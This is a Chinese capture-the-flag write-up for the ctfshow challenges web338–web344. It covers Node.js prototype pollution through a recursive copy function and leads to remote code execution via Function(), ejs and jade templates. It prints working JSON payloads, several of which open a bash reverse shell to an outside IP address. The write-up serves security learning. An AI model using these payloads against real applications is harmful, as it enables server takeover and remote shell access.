当前位置: 首页 > news >正文

ctfshow web入门 web338--web344

news 2025/6/20 18:24:56

web338

原型链污染

comman.js

module.exports = {copy:copy
};function copy(object1, object2){for (let key in object2) {if (key in object2 && key in object1) {copy(object1[key], object2[key])} else {object1[key] = object2[key]}}}

login.js

var express = require('express');
var router = express.Router();
var utils = require('../utils/common');/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {res.type('html');var flag='flag_here';var secert = {};var sess = req.session;let user = {};utils.copy(user,req.body);if(secert.ctfshow==='36dboy'){res.end(flag);}else{return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});  }});module.exports = router;

我们知道没有对象都有一个原生属性就是__proto__然后我们利用这个来使用copy来实现属性的污染把,secret的ctfshow属性变为36dboy

POST:
{"__proto__":{"ctfshow":"36dboy"}}

在这里插入图片描述

然后发包就行

web339

原型链污染覆盖 query 实现命令执行

app.js:

var indexRouter = require('./routes/index');
var loginRouter = require('./routes/login');
var apiRouter = require('./routes/api');

login.js

var express = require('express');
var router = express.Router();
var utils = require('../utils/common');function User(){this.username='';this.password='';
}
function normalUser(){this.user
}/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {res.type('html');var flag='flag_here';var secert = {};var sess = req.session;let user = {};utils.copy(user,req.body);if(secert.ctfshow===flag){res.end(flag);}else{return res.json({ret_code: 2, ret_msg: '登录失败'+JSON.stringify(user)});  }});module.exports = router;

api.js

var express = require('express');
var router = express.Router();
var utils = require('../utils/common');/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {res.type('html');res.render('api', { query: Function(query)(query)});});module.exports = router;

res.render('api', { query: Function(query)(query)});
query属性并且想把这个属性变成函数然后再直接调用这个函数

我们利用这个来覆盖query进行RCE

Function环境下没有require函数,不能获得child_process模块,我们可以通过使用process.mainModule.constructor._load来代替require。

在这里插入图片描述

{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/27.25.151.6/9999 0>&1\"')"}}

然后使得api起反应,那么函数就会被调用了
在这里插入图片描述

在这里插入图片描述

由于是污染题,所以我靶机是开了差不多十来次,终于是拿到了
在这里插入图片描述
最后翻到了flag

web340

login.js变了

var express = require('express');
var router = express.Router();
var utils = require('../utils/common');/* GET home page.  */
router.post('/', require('body-parser').json(),function(req, res, next) {res.type('html');var flag='flag_here';var user = new function(){this.userinfo = new function(){this.isVIP = false;this.isAdmin = false;this.isAuthor = false;     };}utils.copy(user.userinfo,req.body);if(user.userinfo.isAdmin){res.end(flag);}else{return res.json({ret_code: 2, ret_msg: '登录失败'});  }});module.exports = router;

用我们发送的请求(req.body)覆盖user.userinfo的属性为真
而我们要污染到object的话就要两层才能达到因为
userinfo上层为useruser的上层为object

{"__proto__":{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/27.25.151.6/9999 0>&1\"')"}}}

发包然后触发即可
在这里插入图片描述

web341

ejs 原型链污染 RCE

源码和340没有变,但是没有api的函数触发了
首先一样的双层污染
用snyk测一下先发现有ejs的

{"__proto__":{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/27.25.151.6/9999 0>&1\"');var __tmp2"}}}

这里的前面的 _tmp1; 和后面的 var __tmp2 不能删,是为了闭合代码。
在这里插入图片描述
污染之后没有反应,随便访问一个页面,反弹成功
在这里插入图片描述
根目录下面找到flag

web342–web343

jade 原型链污染 rce

{"__proto__":{"__proto__": {"type":"Code","compileDebug":true,"self":true,"line":"0, \"\" ));return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/27.25.151.6/9999 0>&1\"');//"}}}{"__proto__":{"__proto__":{"compileDebug":1,"type":"Code","self":1,"line":"global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/27.25.151.6/9999 0>&1\"')"}}}

在这里插入图片描述
这里有些师傅反弹不到,可能是一个细节res接受JSON

而在是在login发包,你如果原地发会报错

web344

router.get('/', function(req, res, next) {res.type('html');var flag = 'flag_here';if(req.url.match(/8c|2c|\,/ig)){res.end('where is flag :)');}var query = JSON.parse(req.query.query);   if(query.name==='admin'&&query.password==='ctfshow'&&query.isVIP===true){res.end(flag);}else{res.end('where is flag. :)');}});

过滤了8c 2c ,

var query = JSON.parse(req.query.query);   
定义了一个js对象,访问其参数值

直接传就行了

?query={"name":"admin"&query="password":"%63tfshow"&query="isVIP":true}
考虑一下绕过
http://www.lryc.cn/news/393572.html

相关文章:

  • mupdf加载PDF显示中文乱码
  • 常用的限流工具Guava RateLimiter 或Redisson RRateLimiter
  • 卷积神经网络(CNN)和循环神经网络(RNN) 的区别与联系
  • Unity【入门】场景切换和游戏退出及准备
  • Python 函数递归
  • MyBatis(27)如何配置 MyBatis 实现打印可执行的 SQL 语句
  • 3.js - 裁剪平面(clipIntersection:交集、并集)
  • 在5G/6G应用中实现高性能放大器的建模挑战
  • Perl 数据类型
  • 网络协议 -- IP、ICMP、TCP、UDP字段解析
  • 【工具】豆瓣自动回贴软件
  • 初学Spring之动态代理模式
  • Visual studio 2023下使用 installer projects 打包C#程序并创建 CustomAction 类
  • vue学习笔记(购物车小案例)
  • 昇思25天学习打卡营第19天 | RNN实现情感分类
  • 【VUE基础】VUE3第三节—核心语法之ref标签、props
  • 生物化学笔记:电阻抗基础+电化学阻抗谱EIS+电化学系统频率响应分析
  • SQL使用join查询方式找出没有分类的电影id以及名称
  • 对MsgPack与JSON进行序列化的效率比较
  • Unix\Linux 执行shell报错:“$‘\r‘: 未找到命令” 解决
  • 动态路由--RIP配置(思科cisco)
  • python - 函数 / 字典 / 集合
  • connect to github中personal access token生成token方法
  • Appium启动APP时报错Security exception: Permission Denial
  • ubuntu22 使用ufw防火墙
  • 初识STM32:开发方式及环境
  • 详解Amivest 流动性比率
  • pycharm小游戏制作
  • 昇思11天
  • AI绘画Stable Diffusion【图生图教程】:图片高清修复的三种方案详解,你一定能用上!(附资料)